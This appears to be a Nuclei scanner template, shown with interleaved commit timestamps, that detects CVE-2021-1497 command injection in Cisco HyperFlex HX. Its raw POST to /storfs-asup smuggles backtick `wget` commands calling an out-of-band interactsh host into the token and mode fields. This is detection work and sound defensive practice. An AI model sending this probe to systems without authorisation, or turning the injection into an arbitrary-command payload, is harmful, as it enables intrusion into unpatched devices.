2021-07-06 00:30:13 +00:00
id : CVE-2021-1497
2021-07-10 15:15:00 +00:00
2021-07-06 00:30:13 +00:00
info :
name : Cisco HyperFlex HX Data Platform RCE
2021-07-10 15:23:23 +00:00
description : Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2021-07-06 00:30:13 +00:00
author : gy741
severity : critical
2021-08-18 11:37:49 +00:00
reference :
2021-07-06 00:30:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-1497
- https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497
- https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
- https://twitter.com/cycatz2/status/1394615546935529472
- https://twitter.com/Unit42_Intel/status/1402655493735206915
2021-07-10 15:24:04 +00:00
- https://twitter.com/ptswarm/status/1390300625129201664
2021-07-06 00:30:13 +00:00
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
2021-07-10 15:23:23 +00:00
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
2021-07-10 15:15:00 +00:00
tags : cve,cve2021,cisco,rce,oob
2021-07-06 00:30:13 +00:00
requests :
- raw :
- |
POST /storfs-asup HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept : */*
Content-Length : 78
Content-Type : application/x-www-form-urlencoded
2021-07-10 15:23:23 +00:00
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
2021-07-06 00:30:13 +00:00
2021-07-10 15:17:20 +00:00
matchers-condition : and
2021-07-06 00:30:13 +00:00
matchers :
- type : status
status :
- 200
- type : word
2021-07-10 15:23:23 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-07-06 00:30:13 +00:00
words :
2021-07-10 15:23:23 +00:00
- "http"